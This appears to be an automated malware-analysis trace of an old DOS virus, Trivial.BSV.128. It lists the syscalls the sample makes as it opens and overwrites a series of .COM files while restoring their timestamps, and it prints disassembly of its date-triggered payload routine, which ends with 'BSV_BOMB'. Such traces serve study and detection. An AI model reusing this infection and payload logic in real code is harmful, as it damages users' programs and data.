Sample viewer

vx.netlux.org/Virus.DOS.Trivial.BSV.128

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:02.517815979Z 78 PC: 12a47 | Find first file
2018-12-17T22:55:02.525561462Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.531798507Z 61 PC: 12a58 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:02.539454405Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.541989999Z 64 PC: 12a6a | Write file or device (Write 43136 bytes on handle 5)
2018-12-17T22:55:02.560271575Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.562115625Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.571708176Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.574223322Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.577333104Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.582674222Z 61 PC: 12a58 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:55:02.596696904Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.599016471Z 64 PC: 12a6a | Write file or device (Write 36224 bytes on handle 5)
2018-12-17T22:55:02.61179413Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.613978849Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.623128027Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.625939048Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.630342504Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.63554545Z 61 PC: 12a58 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:55:02.64358095Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.646593152Z 64 PC: 12a6a | Write file or device (Write 42368 bytes on handle 5)
2018-12-17T22:55:02.659551078Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.662147557Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.674005987Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.677221686Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.680904431Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.687144924Z 61 PC: 12a58 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:55:02.695510466Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.697633113Z 64 PC: 12a6a | Write file or device (Write 39040 bytes on handle 5)
2018-12-17T22:55:02.711480643Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.714157808Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.724413933Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.727563441Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.731946148Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.736667647Z 61 PC: 12a58 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:55:02.75038304Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.753025631Z 64 PC: 12a6a | Write file or device (Write 36224 bytes on handle 5)
2018-12-17T22:55:02.765336895Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.76748374Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.777416194Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.779914698Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.78281069Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.788650988Z 61 PC: 12a58 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:55:02.79652397Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.798414249Z 64 PC: 12a6a | Write file or device (Write 36224 bytes on handle 5)
2018-12-17T22:55:02.80681849Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.808589895Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.814390198Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.816961127Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.819347713Z 67 PC: 12a50 | Get or set file attributes
2018-12-17T22:55:02.822126421Z 61 PC: 12a58 | Open file (Filename = 'PAH.COM')
2018-12-17T22:55:02.826753878Z 87 PC: 12a5f | Get or set file date and time
2018-12-17T22:55:02.828098649Z 64 PC: 12a6a | Write file or device (Write 36224 bytes on handle 5)
2018-12-17T22:55:02.835319975Z 87 PC: 12a71 | Get or set file date and time
2018-12-17T22:55:02.837077908Z 62 PC: 12a75 | Close file
2018-12-17T22:55:02.84467713Z 42 PC: 12a79 | Get date 0x12a79: cmp dh, byte ptr [0x17e]
0x12a7d: jne 0x12a9d
0x12a7f: cmp dl, byte ptr [0x17f]
0x12a83: jne 0x12a9d
0x12a85: mov al, 5
0x12a87: int 0x16
0x12a89: mov al, 7
0x12a8b: int 0x16
0x12a8d: push ds
0x12a8e: pop es
0x12a8f: xor di, di
0x12a91: mov cx, 0xffff
0x12a94: push cs
0x12a95: pop ds
0x12a96: xor si, si
0x12a98: cld
0x12a99: rep movsb byte ptr es:[di], byte ptr [si]
0x12a9b: jmp 0x12a9d
0x12a9d: mov ah, 0x4f
0x12a9f: int 0x21
2018-12-17T22:55:02.84633803Z 79 PC: 12aa1 | Find next file
2018-12-17T22:55:02.848868872Z 9 PC: 12aaa | Display string (String= 'BSV_BOMB')
2018-12-17T22:55:02.850872284Z 76 PC: 12aae | Terminate with return code (Return code = '36')